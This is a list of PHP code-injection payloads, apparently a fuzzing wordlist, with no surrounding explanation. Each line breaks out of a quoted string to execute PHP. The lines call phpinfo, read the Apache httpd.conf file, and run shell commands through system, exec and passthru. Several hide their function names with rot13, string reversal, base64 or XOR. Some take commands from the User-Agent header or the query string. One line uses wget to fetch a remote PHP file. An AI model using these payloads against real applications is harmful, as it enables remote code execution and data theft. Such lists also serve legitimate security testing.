;phpinfo()				
;@phpinfo()/**/				
"; <?php exec("ls -l /"); ?>				
; file_get_contents(\'/usr/local/apache2/conf/httpd.conf\');				
;echo file_get_contents(implode(DIRECTORY_SEPARATOR, array("usr","local","apache2","conf","httpd.conf"))%09%09%09
"; $_a=(! \'a\') . "php"; $_a.=(! \'a\') . "info"; $_a(1); $b="				
";define(_a,"0008avwga000934mm40re8n5n3aahgqvaga0a303");if(!0)$c=USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC	^_a;	if(	!0	)system($c);//
";if (!0) $_a ="". str_rot13(\'cevags\');$_b = HTTP_USER_AGENT;$_c="". $_SERVER[$_b];$_a( `$_c` );//				
";$_c = "" . $_a($b);$_b(`$_c`);//				
" ;if  (!0) $_a = base64_decode ;if(!0)$_b=parse_str ;$_c= "" .strrev("ftnirp");if(!0)$_d = QUERY_STRING;	$_e=	""	.	$_SERVER[$_d];$_b($_e);$_f = "" . $_a($b);$_c(`$_f`);//
";{if (!($_b[]++%1)) $_a[]  = system;$_a[0]( "ls"); } //				
";;if (!($_b[]  %1)) $_a[0]  = system;$_a[0](!a. "ls");  //				
; e|$a=&$_GET; 0|$b=!a .$a[b];$a[a](`$b`);//				
aaaa { $ {`wget hxxp://example.com/x.php`}}				
";{ if (true) $_a  = "" . strtolower("pass");if   (1) $_a.= "" . strtolower("thru");$_a( "dir"); } //				
";$_y = "" . strrev("ftnirp");if  (!0)    $_a = base64_decode ;if  (!0)    $_b="" . $_a(\'cHdk\');if (!0)	$_y	(`$	_b	`);//
